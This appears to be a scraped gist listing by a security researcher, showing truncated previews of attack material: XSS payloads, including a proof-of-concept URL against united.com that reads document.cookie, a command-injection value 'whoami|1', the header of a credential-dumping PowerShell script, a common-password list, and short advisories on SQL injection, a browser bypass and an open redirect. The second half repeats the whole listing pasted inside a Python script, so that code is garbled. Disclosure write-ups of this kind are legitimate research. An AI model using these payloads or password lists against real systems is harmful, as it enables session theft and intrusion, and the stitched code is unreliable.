Superbug xsuperbug

## test
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>JS Bin</title>
</head>
<body>
<object/onerror=write`1`//


## invoke-mimidogz.ps1
function Invoke-Mimidogz
{


[CmdletBinding(DefaultParameterSetName="DumpCred")]
Param(
	[Parameter(Position = 0)]
	[String[]]
	$ComputerName,

## passwords
admin
test
secret
guest
1234
123456
demo123
demo
password123
password1

## html_test.html
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o

## PIHOME RaspberryPi - Home Automation
Name : PIHOME RaspberryPi - Home Automation
Vendor Homepage : http://pihome.harkemedia.de/
Vulnerability Type : Sql Injection
Researcher : Evren Yalçın <evren [at] superbug [dot] co>

Details :

1- Sql Injection :

Source Code:

## United Airlines XSS Vulnerability
Name : United Airlines XSS Vulnerability
Vendor Homepage : http://www.united.com
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>

Example PoC is as follows :

http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=

----

## gist:7046b8b9e6ba56dd9acb
Name : Active Content Blocking Bypass via Data URIs in Vivaldi Browser
Software : Vivaldi Browser 1.0.83.38 (Developer Build) stable
Vendor Homepage : http://www.vivaldi.net
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>

Description
Vivaldi is a freeware web browser developed by Vivaldi Technologies, a company founded by former co-founder and CEO of Opera, Jon Stephenson von Tetzchner.The project's slogan is "A new browser for our friends", and the browser is aimed at hardcore technologists, heavy internet users, and previous Opera browser users disgruntled by Opera's transition from the Presto engine to Blink, which removed many popular features.

Details

## tpo.com yönlendirme zafiyeti

Zafiyet Hakkında
================
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

Proof of concept
================
https://sso.tpo.com/members/edit?success_url=//google.com

Zaman Çizelgesi

## gist:0ec21ce94a3f66436656
whoami|1

## gist:22d34affd4161001c209
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import random
import time
dosya = open("liste.txt","r")
ipAddress=[]
for i in dosya:
	ipAddr = i
	hexAllFfff = "18446744073709551615"
	<!DOCTYPE html>
	<html>
	<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width">
	<title>JS Bin</title>
	</head>
	<body>
	<object/onerror=write`1`//
	function Invoke-Mimidogz
	{


	[CmdletBinding(DefaultParameterSetName="DumpCred")]
	Param(
	[Parameter(Position = 0)]
	[String[]]
	$ComputerName,
	admin
	test
	secret
	guest
	1234
	123456
	demo123
	demo
	password123
	password1
	Name : PIHOME RaspberryPi - Home Automation
	Vendor Homepage : http://pihome.harkemedia.de/
	Vulnerability Type : Sql Injection
	Researcher : Evren Yalçın <evren [at] superbug [dot] co>

	Details :

	1- Sql Injection :

	Source Code:
	Name : United Airlines XSS Vulnerability
	Vendor Homepage : http://www.united.com
	Vulnerability Type : Cross-Site Scripting
	Researcher : Evren Yalçın <evren [at] superbug [dot] co>

	Example PoC is as follows :

	http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=

	----
	Name : Active Content Blocking Bypass via Data URIs in Vivaldi Browser
	Software : Vivaldi Browser 1.0.83.38 (Developer Build) stable
	Vendor Homepage : http://www.vivaldi.net
	Vulnerability Type : Cross-Site Scripting
	Researcher : Evren Yalçın <evren [at] superbug [dot] co>

	Description
	Vivaldi is a freeware web browser developed by Vivaldi Technologies, a company founded by former co-founder and CEO of Opera, Jon Stephenson von Tetzchner.The project's slogan is "A new browser for our friends", and the browser is aimed at hardcore technologists, heavy internet users, and previous Opera browser users disgruntled by Opera's transition from the Presto engine to Blink, which removed many popular features.

	Details

	Zafiyet Hakkında
	================
	https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

	Proof of concept
	================
	https://sso.tpo.com/members/edit?success_url=//google.com

	Zaman Çizelgesi
	#!/usr/bin/env python
	# -- coding: utf-8 --
	import socket
	import random
	import time
	dosya = open("liste.txt","r")
	ipAddress=[]
	for i in dosya:
	ipAddr = i
	hexAllFfff = "18446744073709551615"